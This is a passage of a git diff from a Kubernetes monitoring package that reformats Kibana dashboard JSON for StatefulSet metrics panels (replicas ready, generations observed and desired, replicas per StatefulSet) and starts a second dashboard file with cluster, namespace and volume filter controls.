"visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "d50dac83-e42b-4ef8-9048-d2c8a737334b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.ready\": *" + }, + "isBucketed": false, + "label": "Replicas Ready ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.ready" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "dd7df777-8dae-4374-96ee-461be82fbde4", - "w": 10, - "x": 19, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "dd7df777-8dae-4374-96ee-461be82fbde4", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "778d517a-5fab-4174-8f76-966de3e4452a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "b58f63d6-4d40-4b42-a746-9f5f96efdcae", + "collapseFn": "sum", + "layerId": "c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "layerType": "data", + "metricAccessor": "d50dac83-e42b-4ef8-9048-d2c8a737334b" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "type": "index-pattern" + "title": "StatefulSet Replicas Ready [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "dd7df777-8dae-4374-96ee-461be82fbde4", + "w": 10, + "x": 19, + "y": 4 + }, + "panelIndex": "dd7df777-8dae-4374-96ee-461be82fbde4", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5": { + "columnOrder": [ + "66f7c724-56a4-45d4-b5fa-029ce4d4468b", + "a6a97e4d-1e79-4822-a8ea-84d06e89038b" + ], + "columns": { + "66f7c724-56a4-45d4-b5fa-029ce4d4468b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5": { - "columnOrder": [ - "66f7c724-56a4-45d4-b5fa-029ce4d4468b", - "a6a97e4d-1e79-4822-a8ea-84d06e89038b" - ], - "columns": { - "66f7c724-56a4-45d4-b5fa-029ce4d4468b": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "a6a97e4d-1e79-4822-a8ea-84d06e89038b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.generation.observed\": *" - }, - "isBucketed": false, - "label": "Generation Observed", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.generation.observed" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "66f7c724-56a4-45d4-b5fa-029ce4d4468b", - "collapseFn": "sum", - "layerId": "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "layerType": "data", - "metricAccessor": "a6a97e4d-1e79-4822-a8ea-84d06e89038b" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Generation Observed [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "a6a97e4d-1e79-4822-a8ea-84d06e89038b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.generation.observed\": *" + }, + "isBucketed": false, + "label": "Generation Observed", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.generation.observed" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", - "w": 10, - "x": 29, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "66f7c724-56a4-45d4-b5fa-029ce4d4468b", + "collapseFn": "sum", + "layerId": "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "layerType": "data", + "metricAccessor": "a6a97e4d-1e79-4822-a8ea-84d06e89038b" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "type": "index-pattern" + "title": "StatefulSet Generation Observed [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", + "w": 10, + "x": 29, + "y": 4 + }, + "panelIndex": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "84dd109c-0824-4ccf-948b-8bad46f6203a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7f72a30a-3591-492d-83d7-2fd9d40e5ef6": { + "columnOrder": [ + "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", + "c0c872cb-98c7-4070-861e-56fa930708a1" + ], + "columns": { + "c0c872cb-98c7-4070-861e-56fa930708a1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.generation.desired\": *" + }, + "isBucketed": false, + "label": "Generation Desired ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.generation.desired" + }, + "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "84dd109c-0824-4ccf-948b-8bad46f6203a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7f72a30a-3591-492d-83d7-2fd9d40e5ef6": { - "columnOrder": [ - "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", - "c0c872cb-98c7-4070-861e-56fa930708a1" - ], - "columns": { - "c0c872cb-98c7-4070-861e-56fa930708a1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.generation.desired\": *" - }, - "isBucketed": false, - "label": "Generation Desired ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.generation.desired" - }, - "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "84dd109c-0824-4ccf-948b-8bad46f6203a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", - "collapseFn": "sum", - "layerId": "7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "layerType": "data", - "metricAccessor": "c0c872cb-98c7-4070-861e-56fa930708a1" - } - }, - "title": "StatefulSet Generation Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", - "w": 9, - "x": 39, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "84dd109c-0824-4ccf-948b-8bad46f6203a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", + "collapseFn": "sum", + "layerId": "7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "layerType": "data", + "metricAccessor": "c0c872cb-98c7-4070-861e-56fa930708a1" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "33ac762e-904d-4a44-a943-e76d147b5770", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0b03a29a-8bd6-485d-b34c-5682853a3ec6": { - "columnOrder": [ - "c7aa47ec-c87d-47ac-a318-a00b90b32b5d", - "0c8870bf-3e60-4949-9715-6b7a762034b4", - "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" - ], - "columns": { - "0c8870bf-3e60-4949-9715-6b7a762034b4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.statefulset.replicas.desired: *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.desired" - }, - "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.statefulset.replicas.ready: *" - }, - "isBucketed": false, - "label": "Replicas ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.ready" - }, - "c7aa47ec-c87d-47ac-a318-a00b90b32b5d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "StatefulSet Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0c8870bf-3e60-4949-9715-6b7a762034b4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "incompleteColumns": {} - } - } - } + "title": "StatefulSet Generation Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", + "w": 9, + "x": 39, + "y": 4 + }, + "panelIndex": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "33ac762e-904d-4a44-a943-e76d147b5770", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b03a29a-8bd6-485d-b34c-5682853a3ec6": { + "columnOrder": [ + "c7aa47ec-c87d-47ac-a318-a00b90b32b5d", + "0c8870bf-3e60-4949-9715-6b7a762034b4", + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" + ], + "columns": { + "0c8870bf-3e60-4949-9715-6b7a762034b4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.statefulset.replicas.desired: *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.desired" + }, + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.statefulset.replicas.ready: *" + }, + "isBucketed": false, + "label": "Replicas ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.ready" + }, + "c7aa47ec-c87d-47ac-a318-a00b90b32b5d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "StatefulSet Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0c8870bf-3e60-4949-9715-6b7a762034b4", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "33ac762e-904d-4a44-a943-e76d147b5770", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "accessors": [ - "0c8870bf-3e60-4949-9715-6b7a762034b4", - "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" - ], - "layerId": "0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "c7aa47ec-c87d-47ac-a318-a00b90b32b5d" - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } - }, - "title": "Replicas per StatefulSet [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "33ac762e-904d-4a44-a943-e76d147b5770", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "f482071f-d956-4817-90b5-82a74d8aa841", - "w": 48, - "x": 0, - "y": 11 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "0c8870bf-3e60-4949-9715-6b7a762034b4", + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" + ], + "layerId": "0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "c7aa47ec-c87d-47ac-a318-a00b90b32b5d" + } + ], + "legend": { + "isVisible": true, + "position": "right" }, - "panelIndex": "f482071f-d956-4817-90b5-82a74d8aa841", - "title": "Replicas per StatefulSet [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] StatefulSets", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:40:45.524Z", - "id": "kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "d8265dae-829d-434f-a826-cc6062edfd3a:indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d8265dae-829d-434f-a826-cc6062edfd3a:988215de-1bb2-4dd7-91a4-a07d3d436b89", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:3fbf4162-1133-4eee-ad35-334b047efd3d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dd7df777-8dae-4374-96ee-461be82fbde4:indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dd7df777-8dae-4374-96ee-461be82fbde4:778d517a-5fab-4174-8f76-966de3e4452a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:84dd109c-0824-4ccf-948b-8bad46f6203a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f482071f-d956-4817-90b5-82a74d8aa841:indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f482071f-d956-4817-90b5-82a74d8aa841:33ac762e-904d-4a44-a943-e76d147b5770", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_5f6614ff-57c0-400e-8350-47e86ad5c77f:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "Replicas per StatefulSet [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_6faac538-d3fd-4f77-85cc-3b7171c7144c:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 14, + "i": "f482071f-d956-4817-90b5-82a74d8aa841", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_82c41492-acf8-4b51-bba9-ec54c99fb1ba:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "f482071f-d956-4817-90b5-82a74d8aa841", + "title": "Replicas per StatefulSet [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] StatefulSets", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d8265dae-829d-434f-a826-cc6062edfd3a:indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d8265dae-829d-434f-a826-cc6062edfd3a:988215de-1bb2-4dd7-91a4-a07d3d436b89", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21039d12-cc17-4089-9d8f-3c62018c8f1c:3fbf4162-1133-4eee-ad35-334b047efd3d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd7df777-8dae-4374-96ee-461be82fbde4:indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd7df777-8dae-4374-96ee-461be82fbde4:778d517a-5fab-4174-8f76-966de3e4452a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3e6790d6-de88-47de-8c3e-d8aa2c89c538:0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3:84dd109c-0824-4ccf-948b-8bad46f6203a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f482071f-d956-4817-90b5-82a74d8aa841:indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f482071f-d956-4817-90b5-82a74d8aa841:33ac762e-904d-4a44-a943-e76d147b5770", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_5f6614ff-57c0-400e-8350-47e86ad5c77f:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_6faac538-d3fd-4f77-85cc-3b7171c7144c:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_82c41492-acf8-4b51-bba9-ec54c99fb1ba:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json index 1f74effa077..d578f97bfdc 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013.json @@ -1,490 +1,500 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"c9e17236-d41d-4748-8eb7-54c93d5a1478\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"c9e17236-d41d-4748-8eb7-54c93d5a1478\",\"enhancements\":{}}},\"049e831a-2716-4c4b-a037-b2b45789842a\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"049e831a-2716-4c4b-a037-b2b45789842a\",\"selectedOptions\":[],\"enhancements\":{}}},\"60ec5f9c-087d-48e6-98ab-488952a7b186\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.volume.name\",\"title\":\"Volume Name\",\"id\":\"60ec5f9c-087d-48e6-98ab-488952a7b186\",\"enhancements\":{}}}}" + "id": "kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"c9e17236-d41d-4748-8eb7-54c93d5a1478\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"c9e17236-d41d-4748-8eb7-54c93d5a1478\",\"enhancements\":{}}},\"049e831a-2716-4c4b-a037-b2b45789842a\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace 